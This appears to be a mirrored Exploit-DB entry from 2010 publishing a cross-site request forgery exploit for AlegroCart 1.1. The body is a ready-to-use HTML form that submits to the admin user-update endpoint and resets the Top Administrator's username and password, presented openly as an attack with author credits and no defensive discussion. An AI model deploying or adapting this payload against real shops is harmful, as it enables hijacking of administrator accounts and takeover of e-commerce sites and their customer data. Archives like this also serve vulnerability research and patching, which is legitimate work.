Home Of AlegroCart 1.1 – Cross-Site Request Forgery (Change Administrator Password)

• Exploit Database
• 10 阅读

• 作者： The.Morpheus
  日期： 2010-02-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11311/

• [#]----------------------------------------------------------------[#]
  #
  # [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password
  #
  # // Author Info
  # [x] Author: The.Morpheus
  # [x] Contact: fats0L@windowslive.com<mailto:fats0L@windowslive.com>
  # [x] Thanks: Türksec.&#304;nfo ~ Nd And Tg Tayfa :P
  # [x] Date : 01.02.2010
  #
  [#]-------------------------------------------------------------------------------------------[#]
  
  # Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4
  
  # [x] Exploit :
  #
  # [ XSRF ]
  #
  # [ Login ]
  # http://[server]/[path]/admin/
  #
  # // Start XSRF
  |-------------------------------------------------------------------------------|
  
  <form action="http://server/admin/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart/form-data" id="form">
  width="185"><span class="required">*</span> Username:</td>
  <input type="text" name="username" value="admin">
  <span class="required">*</span> First Name:</td>
  <input type="text" name="firstname" value="admin">
  <span class="required">*</span> Last Name:</td>
  <input type="text" name="lastname" value="admin">
  <td>E-Mail:</td>
  <input type="text" name="email" value="admin"></td>
  <td>User Group:</td>
  <td><select name="user_group_id">
  <option value="1" selected>Top Administrator</option>
  </select></td>
  <td>Password:</td>
  <input type="password" name="password" value="" >
  <td>Confirm:</td>
  <input type="password" name="confirm" value="">
  </form>
  
  
  |-------------------------------------------------------------------------------|
  # // End of attack ~
  #
  [#]------------------------------------------------------------------------------------------[#]